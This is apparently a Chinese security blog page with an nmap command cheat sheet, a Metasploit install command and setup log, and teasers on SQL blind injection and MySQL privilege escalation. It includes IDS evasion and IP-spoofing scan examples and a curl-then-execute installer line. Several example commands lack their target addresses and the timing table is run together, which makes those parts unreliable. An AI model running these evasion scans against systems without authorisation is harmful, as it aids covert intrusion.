nmap 命令集

- Target Specification

Switch Example Description
nmap Scan a single IP
nmap Scan specific IPs
nmap Scan a range
nmap scanme.nmap.org Scan a domain
nmap Scan using CIDR notation
nmap -iL targets.txt Scan targets from a file
nmap -iR 100 Scan 100 random hosts
nmap –exclude Exclude listed hosts

- Scan Techniques

Switch Example Description
-sS nmap -sS TCP SYN port scan (Default)
-sT nmap -sT TCP connect port scan
(Default without root privilege)
-sU nmap -sU UDP port scan
-sA nmap -sA TCP ACK port scan
-sW nmap -sW TCP Window port scan
-sM nmap -sM TCP Maimon port scan

- Host Discovery

Switch Example Description
-sL nmap -sL No Scan. List targets only
-sn nmap -sn Disable port scanning. Host discovery only.
-Pn nmap -Pn Disable host discovery. Port scan only.
-PS nmap -PS 22-25,80 TCP SYN discovery on port x.
Port 80 by default
-PA nmap -PA 22-25,80 TCP ACK discovery on port x.
Port 80 by default
-PU nmap -PU 53 UDP discovery on port x.
Port 40125 by default
-PR nmap -PR ARP discovery on local network
-n nmap -n Never do DNS resolution

- Port Specification

Switch Example Description
-p nmap -p 21 Port scan for port x
-p nmap -p 21-100 Port range
-p nmap -p U:53,T:21-25,80 Port scan multiple TCP and UDP ports
-p- nmap -p- Port scan all ports
-p nmap -p http,https Port scan from service name
-F nmap -F Fast port scan (100 ports)
–top-ports nmap –top-ports 2000 Port scan the top x ports
-p-65535 nmap -p-65535 Leaving off initial port in range
makes the scan start at port 1
-p0- nmap -p0- Leaving off end port in range
makes the scan go through to port 65535

- Service and Version Detection

Switch Example Description
-sV nmap -sV Attempts to determine the version of the service running on port
-sV –version-intensity nmap -sV –version-intensity 8 Intensity level 0 to 9. Higher number increases possibility of correctness
-sV –version-light nmap -sV –version-light Enable light mode. Lower possibility of correctness. Faster
-sV –version-all nmap -sV –version-all Enable intensity level 9. Higher possibility of correctness. Slower
-A nmap -A Enables OS detection, version detection, script scanning, and traceroute

- OS Detection

Switch Example Description
-O nmap -O Remote OS detection using TCP/IP
stack fingerprinting
-O –osscan-limit nmap -O –osscan-limit If at least one open and one closed
TCP port are not found it will not try
OS detection against host
-O –osscan-guess nmap -O –osscan-guess Makes Nmap guess more aggressively
-O –max-os-tries nmap -O –max-os-tries 1 Set the maximum number x of OS
detection tries against a target
-A nmap -A Enables OS detection, version detection, script scanning, and traceroute

- Timing and Performance

Switch Example Description
-T0 nmap -T0 Paranoid (0) Intrusion Detection System evasion 0 nmap -T1Sneaky (1) Intrusion Detection Systemevasion 0 nmap -T2Polite (2) slows down the scan to useless bandwidth and use less target machine resources 0 nmap -T3Normal (3) which is default speed0 nmap -T4Aggressive (4) speeds scans; assumesyou are on a reasonably fast and reliable network 0 nmap -T5Insane (5) speeds scan; assumes you`
are on an extraordinarily fast network

Switch Example input Description

  • NSE Scripts

Switch Example Description
-sC nmap -sC Scan with default NSE scripts. Considered useful for discovery and safe
–script default nmap –script default Scan with default NSE scripts. Considered useful for discovery and safe
–script nmap –script=banner Scan with a single script. Example banner
–script nmap –script=http* Scan with a wildcard. Example http
–script nmap –script=http,banner Scan with two scripts. Example http and banner
–script nmap –script “not intrusive” Scan default, but remove intrusive scripts
–script-args nmap –script snmp-sysdescr –script-args snmpcommunity=admin NSE script with arguments

- Useful NSE Script Examples

Command Description
nmap -Pn –script=http-sitemap-generator scanme.nmap.org http site map generator
nmap -n -Pn -p 80 –open -sV -vvv –script banner,http-title -iR 1000 Fast search for random web servers
nmap -Pn –script=dns-brute domain.com Brute forces DNS hostnames guessing subdomains
nmap -n -Pn -vv -O -sV –script smb-enum,smb-ls,smb-mbenum,smb-os-discovery,smb-s,smb-vuln,smbv2 -vv Safe SMB scripts to run
nmap –script whois* domain.com Whois query
nmap -p80 –script http-unsafe-output-escaping scanme.nmap.org Detect cross site scripting vulnerabilities
nmap -p80 –script http-sql-injection scanme.nmap.org Check for SQL injections

  • Firewall / IDS Evasion and Spoofing

Switch Example Description
-f nmap -f Requested scan (including ping scans) use tiny fragmented IP packets. Harder for packet filters
–mtu nmap –mtu 32 Set your own offset size
-D nmap -D,, Send scans from spoofed IPs,
-D nmap -D decoy-ip1,decoy-ip2,your-own-ip,decoy-ip3,decoy-ip4 remote-host-ip Above example explained
-S nmap -S www.microsoft.com www.facebook.com Scan Facebook from Microsoft (-e eth0 -Pn may be required)
-g nmap -g 53 Use given source port number
–proxies nmap –proxies, Relay connections through HTTP/SOCKS4 proxies
–data-length nmap –data-length 200 Appends random data to sent packets

- Example IDS Evasion command

nmap -f -t 0 -n -Pn –data-length 200 -D,,,

  • Output

Switch Example Description
-oN nmap -oN normal.file Normal output to the file normal.file
-oX nmap -oX xml.file XML output to the file xml.file
-oG nmap -oG grep.file Grepable output to the file grep.file
-oA nmap -oA results Output in the three major formats at once
-oG – nmap -oG – Grepable output to screen. -oN -, -oX – also usable
–append-output nmap -oN file.file –append-output Append a scan to a previous scan file
-v nmap -v Increase the verbosity level (use -vv or more for greater effect)
-d nmap -d Increase debugging level (use -dd or more for greater effect)
–reason nmap –reason Display the reason a port is in a particular state, same output as -vv
–open nmap –open Only show open (or possibly open) ports
–packet-trace nmap -T4 –packet-trace Show all packets sent and received
–iflist nmap –iflist Shows the host interfaces and routes
–resume nmap –resume results.file Resume a scan

  • Helpful Nmap Output examples

Command Description
nmap -p80 -sV -oG – –open | grep open Scan for web servers and grep to show which IPs are running web servers
nmap -iR 10 -n -oX out.xml | grep “Nmap” | cut -d ” ” -f5 > live-hosts.txt Generate a list of the IPs of live hosts
nmap -iR 10 -n -oX out2.xml | grep “Nmap” | cut -d ” ” -f5 >> live-hosts.txt Append IP to the list of live hosts ndiff scanl.xml scan2.xml Compare output from nmap using the ndif xsltproc nmap.xml -o nmap.html Convert nmap xml files to html files
grep ” open ” results.nmap | sed -r ‘s/ +/ /g’ | sort | uniq -c | sort -rn | less Reverse sorted list of how often ports turn up

- Miscellaneous Options

Switch Example Description
-6 nmap -6 2607:f0d0:1002:51::4 Enable IPv6 scanning
-h nmap -h nmap help screen

- Other Useful Nmap Commands

Command Description
nmap -iR 10 -PS22-25,80,113,1050,35000 -v -sn Discovery only on ports x, no port scan
nmap -PR -sn -vv Arp discovery only on local network, no port scan
nmap -iR 10 -sn -traceroute Traceroute to random targets, no port scan
nmap -sL –dns-server Query the Internal DNS for hosts, list targets only




curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall



** Welcome to Metasploit Framework Initial Setup **
Please answer a few questions to get started.
Would you like to use and setup a new database (recommended)?
Please answer yes or no.
Would you like to use and setup a new database (recommended)? yes
Creating database at /home/lujinli/.msf4/db
Starting database at /home/lujinli/.msf4/db...success
Creating database users
Creating initial database schema
msf > db_status
[*] postgresql connected to msf







  • 布尔盲注
  • 时间盲注
  • 报错盲注


  • 提交sql语句测试,页面有返回,但无错误信息;
  • 提交sql语句测试,会返回一个通用的错误页面;
  • 提交sql语句测试,即无错误页面,也无任何方式影响页面输出;
Read more



Read more



Read more

日常练习php中,在书 《跟兄弟连学php》 page·515中,写到



Read more



Read more
mysql提权Read more


POST 请求的情况下,最好使用 php://input 来代替$HTTP_RAW_POST_DATA,因为它不依赖于特定的php.ini指令。

Read more

oncanplay 事件

  • oncanplay 事件在用户开始播放视频/音频(audio/video)时触发。
Read more